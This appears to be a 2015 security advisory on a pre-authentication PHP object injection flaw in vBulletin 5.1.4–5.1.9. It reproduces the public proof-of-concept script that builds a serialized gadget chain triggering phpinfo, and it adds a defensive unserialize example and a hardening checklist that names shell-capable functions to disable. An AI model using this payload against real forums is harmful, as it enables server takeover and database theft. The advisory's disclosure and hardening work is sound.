PreAuth PHP Object Injection Critical Vulnerability in vBulletin Versions 5.1.4 to 5.1.9

November 5, 2015

vBulletin released security patches on 03 Nov 2015. vBulletin 5.1.4 to 5.1.9 is vulnerable to PHP object injection, which lets an attacker take control of the website and dump the database of the vBulletin forum.

The vulnerability has been released publicly. It is very serious and easy to exploit to compromise the vBulletin forum server. The main vBulletin forum was defaced on Monday using this vulnerability.

We recommend that all vBulletin users patch the PHP Object Injection vulnerability and harden the vBulletin server setup.

Technical Information

The decodeArguments Ajax API hook is the vulnerable module of vBulletin. Because it is vulnerable to PHP object injection, an attacker needs to construct PHP objects.

The following script has been released to construct the objects:

<?php
class vB_Database {
       public $functions = array();

       public function __construct() 
       {
               $this->functions['free_result'] = 'phpinfo';
       }
}

class vB_dB_Result {
       protected $db;
       protected $recordset;

       public function __construct()
       {
               $this->db = new vB_Database();
               $this->recordset = 1;
       }
}

print urlencode(serialize(new vB_dB_Result())) . "\n";
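
PHP object injection arises when request data reaches `unserialize()` and is allowed to instantiate application classes. The following is an added defensive example, not vBulletin's code or its patch: the helper `decode_untrusted_arguments()`, the `DemoResult` class and the sample strings are hypothetical and constructed here, and PHP 7.0 or later is assumed for the `allowed_classes` option.

```php
<?php
// Hypothetical stand-in for an application class with a side-effecting destructor.
class DemoResult
{
    public $recordset = 1;
    public function __destruct()
    {
        echo "DemoResult destructor ran\n";
    }
}

// True if $value is, or contains at any depth, an object or object placeholder.
function contains_object($value)
{
    if (is_object($value) || $value instanceof __PHP_Incomplete_Class) {
        return true;
    }
    foreach (is_array($value) ? $value : [] as $item) {
        if (contains_object($item)) {
            return true;
        }
    }
    return false;
}

// Hypothetical helper: decode request arguments without instantiating classes.
function decode_untrusted_arguments($raw)
{
    // allowed_classes => false turns every serialized object into an inert
    // __PHP_Incomplete_Class, so no __wakeup() or __destruct() of a real class runs.
    $value = @unserialize($raw, ['allowed_classes' => false]);
    if (!is_array($value) || contains_object($value)) {
        throw new InvalidArgumentException('expected a serialized array without objects');
    }
    return $value;
}
// Constructed sample inputs: a plain array, then an array carrying an object.
$samples = [
    'a:2:{s:4:"page";i:2;s:4:"sort";s:4:"date";}',
    'a:1:{s:4:"page";O:10:"DemoResult":1:{s:9:"recordset";i:1;}}',
];
foreach ($samples as $raw) {
    try {
        var_export(decode_untrusted_arguments($raw));
    } catch (InvalidArgumentException $e) {
        echo 'rejected: ' . $e->getMessage();
    }
    echo "\n";
}
```

Where the wire format can be changed, `json_decode()` removes the object-instantiation path altogether.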

Recommended Steps

  1. Update vBulletin with given patch link
  2. Change the default administrator username
  3. Protect directories and files – Protect the administrator directory with .htaccess protection. For details on protection implementation click here
  4. Disable unneeded functions and classes, e.g. eval(), system(), show_source, shell_exec, passthru, exec, phpinfo, proc_open, popen, and highlight_file
  5. Turn off display_errors in php.ini
  6. Limit administrator panel access by allowing only a trusted set of IP addresses
  7. Configure open_basedir in php.ini

You can find more technical details about the vulnerability here
